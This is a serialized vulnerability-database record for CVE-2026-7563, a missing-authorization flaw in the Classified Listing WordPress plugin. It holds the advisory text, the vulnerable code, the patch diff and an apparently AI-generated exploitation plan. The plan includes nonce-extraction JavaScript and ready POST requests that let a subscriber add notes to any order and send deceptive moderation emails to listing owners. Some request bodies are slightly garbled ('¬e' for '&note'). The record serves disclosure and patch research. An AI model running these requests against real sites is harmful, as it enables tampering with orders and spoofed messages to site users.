[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fu_pXU3ynFPObHOerEyTCuSKEyApdTFlgBZEvUp2u4dE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-7563","classified-listing-missing-authorization-to-authenticated-subscriber-arbitrary-modification-via-addordernote-and-sendema","Classified Listing \u003C= 5.3.10 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Modification via add_order_note and send_email_to_user_by_moderator AJAX Actions","The Classified Listing – AI-Powered Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 5.3.10. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to add arbitrary notes to any order and trigger unsolicited notification and moderation emails to listing owners without administrative authorization.","classified-listing",null,"\u003C=5.3.10","5.4.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-14 19:53:53","2026-05-15 08:27:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F07cb3d57-d768-49a5-8af0-9dc4384487d5?source=api-prod",1,[22,23,24,25,26,27,28,29],"README.txt","app\u002FControllers\u002FAdmin\u002FScriptLoader.php","app\u002FControllers\u002FAjax\u002FListingAdminAjax.php","app\u002FControllers\u002FHooks\u002FComments.php","app\u002FHelpers\u002FFunctions.php","assets\u002Fblock\u002Fmain.asset.php","assets\u002Fblock\u002Fmain.js","assets\u002Fcss\u002Frtcl-admin-settings.min.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-7563 (Classified Listing)\n\n## 1. Vulnerability Summary\n**Vulnerability Type:** Missing Authorization\n**Target Plugin:** Classified Listing – AI-Powered Classified ads & Business Directory Plugin\n**Affected Versions:** \u003C= 5.3.10\n**Vulnerable Actions:** `rtcl_add_order_note` and `rtcl_send_email_to_user_by_moderator`\n**Severity:** Medium (CVSS 4.3)\n\nThe vulnerability exists because two AJAX handlers—`add_order_note` and `send_email_to_user_by_moderator`—fail to implement any capability checks (`current_user_can`). While they verify a WordPress nonce, the nonce is available to any authenticated user (Subscriber level and above). This allows a Subscriber to add arbitrary notes to any Order ID (IDOR) and trigger moderation emails for any Listing ID.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** POST\n- **Authentication:** Required (Subscriber level or higher)\n- **Actions:** \n - `action=rtcl_add_order_note` (adds notes to orders)\n - `action=rtcl_send_email_to_user_by_moderator` (triggers emails for listings)\n- **Preconditions:**\n - The attacker must be authenticated as a Subscriber.\n - For `rtcl_add_order_note`, the attacker needs a target `post_id` corresponding to an order.\n - For `rtcl_send_email_to_user_by_moderator`, the attacker needs a target `post_id` corresponding to a listing.\n\n## 3. Code Flow\n\n### Case A: Arbitrary Order Note\n1. **Entry Point:** `app\u002FControllers\u002FHooks\u002FComments.php` registers `wp_ajax_rtcl_add_order_note` to `add_order_note()`.\n2. **Nonce Check:** `wp_verify_nonce` is called using `rtcl()->nonceId` and `rtcl()->nonceText`.\n3. **Missing Auth:** The function immediately proceeds to extract `post_id`, `note`, and `note_type` from `$_POST`. No check is made to ensure the user is an admin or the owner of the order.\n4. **Sink:** `$order->add_note($note, $is_customer_note, true)` is called, which creates a new comment of type `rtcl_order_note` attached to the `post_id`.\n\n### Case B: Unsolicited Moderation Emails\n1. **Entry Point:** `app\u002FControllers\u002FAjax\u002FListingAdminAjax.php` registers `wp_ajax_rtcl_send_email_to_user_by_moderator` to `send_email_to_user_by_moderator()`.\n2. **Nonce Check:** `wp_verify_nonce` is called.\n3. **Missing Auth:** The function proceeds to extract `post_id` and `message`.\n4. **Sink:** `rtcl()->mailer()->emails['Listing_Moderation_Email_To_Owner']->trigger($post_id, $data)` is called, sending an email to the listing owner containing the arbitrary `message`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes the nonce into a JavaScript object named `rtcl`.\n\n1. **Shortcode Identification:** The plugin typically enqueues its core scripts on listing pages or the user dashboard. However, `ScriptLoader.php` shows that `rtcl-verify-js` is registered on the login page via `login_enqueue_scripts`, and `rtcl-common` is enqueued on the frontend.\n2. **Strategy:**\n - Log in as a Subscriber.\n - Create a simple page with the listing dashboard shortcode: `[rtcl_my_account]`.\n - Navigate to that page.\n - Use `browser_eval` to extract the nonce ID and value.\n3. **JS Variable Identification:**\n - Inspect the `rtcl` object: `window.rtcl`.\n - The nonce key is stored in the property matching the value of `rtcl()->nonceId`. \n - Based on the source code in `ScriptLoader.php`, the localized object is `rtcl`.\n\n**Actionable JS Extraction:**\n```javascript\n\u002F\u002F To find the nonce key and value\nconst nonceKey = Object.keys(window.rtcl).find(k => k.includes('nonce'));\nconst nonceValue = window.rtcl[nonceKey];\nreturn { nonceKey, nonceValue };\n```\n\n## 5. Exploitation Strategy\n\n### Step 1: Add Arbitrary Order Note\n**Request:**\n- **URL:** `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n ```text\n action=rtcl_add_order_note&post_id=123¬e=UnAuthorized_Note_Added¬e_type=customer&[NONCE_KEY]=[NONCE_VALUE]\n ```\n*(Replace `123` with a valid Order ID; Replace `[NONCE_KEY]` with the key found in step 4).*\n\n### Step 2: Trigger Moderation Email\n**Request:**\n- **URL:** `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n ```text\n action=rtcl_send_email_to_user_by_moderator&post_id=456&message=Your+account+is+under+review+for+malpractice.&[NONCE_KEY]=[NONCE_VALUE]\n ```\n*(Replace `456` with a valid Listing ID).*\n\n## 6. Test Data Setup\n1. **Target Admin User:** Ensure an admin user exists.\n2. **Target Content:**\n - Create a Listing (Post Type: `rtcl_listing`) as the Admin. Note its ID.\n - Create an Order (Post Type: `rtcl_order`) as the Admin. Note its ID.\n3. **Attacker User:**\n - Create a user with the `subscriber` role.\n4. **Nonce Page:**\n - Create a page at `\u002Fnonce-grabber` containing the shortcode `[rtcl_my_account]`.\n\n## 7. Expected Results\n- **Order Note:** The AJAX response should contain JSON with an `html` key containing the rendered list item for the new note.\n- **Moderation Email:** The AJAX response should contain `{\"error\":false,\"message\":\"Successfully sent\",\"class\":\"rtcl-flash-success\"}`.\n\n## 8. Verification Steps\n### Verify Order Note via WP-CLI:\n```bash\n# Check for comments of type 'rtcl_order_note' on the target post\nwp comment list --post_id=123 --meta_key=is_customer_note\n```\n\n### Verify Moderation Email Trigger via Database:\n```bash\n# Check if the notification count incremented in post meta\nwp post meta get 456 _notification_by_moderator\n```\n\n## 9. Alternative Approaches\nIf `rtcl_add_order_note` fails due to strict Order object instantiation, use `rtcl_delete_order_note` to test for authorization. Note that `delete_order_note` in `Comments.php` (line 126) **does** have a capability check: `current_user_can('manage_rtcl_options')`. The contrast between the two functions in the same file confirms that `add_order_note` is the primary vulnerability.","The Classified Listing plugin for WordPress is vulnerable to unauthorized data modification and email triggering due to missing capability checks in the `rtcl_add_order_note` and `rtcl_send_email_to_user_by_moderator` AJAX actions. This allows authenticated users with subscriber-level permissions or higher to add arbitrary notes to any order and send unsolicited moderation emails to listing owners.","\u002F\u002F app\u002FControllers\u002FHooks\u002FComments.php (Line 41-55)\n\tstatic function add_order_note() {\n\t\tif ( ! wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? $_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) || ! isset( $_POST['post_id'], $_POST['note'], $_POST['note_type'] ) ) {\n\t\t\twp_die( -1 );\n\t\t}\n\n\t\t$post_id = absint( $_POST['post_id'] );\n\t\t$note = wp_kses_post( trim( wp_unslash( $_POST['note'] ) ) );\n\t\t$note_type = Functions::clean( wp_unslash( $_POST['note_type'] ) );\n\n\t\t$is_customer_note = ( 'customer' === $note_type ) ? 1 : 0;\n\t\t$html = '';\n\t\tif ( $post_id > 0 ) {\n\t\t\t$order = rtcl()->factory->get_order( $post_id );\n\t\t\t$comment_id = $order->add_note( $note, $is_customer_note, true );\n\n---\n\n\u002F\u002F app\u002FControllers\u002FAjax\u002FListingAdminAjax.php (Line 36-46)\n\tfunction send_email_to_user_by_moderator() {\n\t\t$error = true;\n\t\t$class = 'rtcl-flash-warn';\n\t\tif ( wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? $_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) ) {\n\t\t\t$post_id = ! empty( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;\n\t\t\t$message = ! empty( $_POST['message'] ) ? esc_textarea( $_POST['message'] ) : '';\n\t\t\t$post = get_post( $post_id );\n\t\t\tif ( $post && $message ) {\n\t\t\t\t$data['message'] = $message;\n\t\t\t\t$is_send = rtcl()->mailer()->emails['Listing_Moderation_Email_To_Owner']->trigger( $post_id, $data );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php\t2026-04-29 05:15:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FAjax\u002FListingAdminAjax.php\t2026-05-10 10:42:16.000000000 +0000\n@@ -36,6 +36,16 @@\n \t}\n \n \tfunction send_email_to_user_by_moderator() {\n+\t\tif ( ! current_user_can( 'manage_rtcl_options' ) ) {\n+\t\t\twp_send_json(\n+\t\t\t\t[\n+\t\t\t\t\t'error' => true,\n+\t\t\t\t\t'message' => esc_html__( 'Unauthorized access!!!', 'classified-listing' ),\n+\t\t\t\t\t'class' => 'rtcl-flash-warn',\n+\t\t\t\t],\n+\t\t\t);\n+\t\t}\n+\n \t\t$error = true;\n \t\t$class = 'rtcl-flash-warn';\n \t\tif ( wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? $_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) ) {\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FHooks\u002FComments.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FHooks\u002FComments.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.3.10\u002Fapp\u002FControllers\u002FHooks\u002FComments.php\t2026-04-29 05:15:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fclassified-listing\u002F5.4.0\u002Fapp\u002FControllers\u002FHooks\u002FComments.php\t2026-05-10 10:42:16.000000000 +0000\n@@ -49,7 +49,11 @@\n \t *\u002F\n \tstatic function add_order_note() {\n \t\tif ( ! wp_verify_nonce( isset( $_REQUEST[ rtcl()->nonceId ] ) ? $_REQUEST[ rtcl()->nonceId ] : null, rtcl()->nonceText ) || ! isset( $_POST['post_id'], $_POST['note'], $_POST['note_type'] ) ) {\n-\t\t\twp_die( -1 );\n+\t\t\twp_die( - 1 );\n+\t\t}\n+\n+\t\tif ( ! current_user_can( 'manage_rtcl_options' ) ) {\n+\t\t\twp_die( - 1 );\n \t\t}","The exploit targets the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint. An attacker first authenticates as a Subscriber and retrieves a valid nonce from the global `rtcl` JavaScript object, which is localized on most frontend listing pages or the user dashboard. To add an arbitrary note to an order, the attacker sends a POST request with the action `rtcl_add_order_note`, the target `post_id` of an order, and the `note` content. To trigger a moderation email, the attacker sends a POST request with the action `rtcl_send_email_to_user_by_moderator`, the `post_id` of a listing, and a custom `message`. Both actions only verify the nonce and do not check if the user has the 'manage_rtcl_options' capability.","gemini-3-flash-preview","2026-05-20 17:37:32","2026-05-20 17:38:15",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.3.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclassified-listing\u002Ftags\u002F5.3.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclassified-listing.5.3.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclassified-listing\u002Ftags\u002F5.4.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fclassified-listing.5.4.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fclassified-listing\u002Ftags"]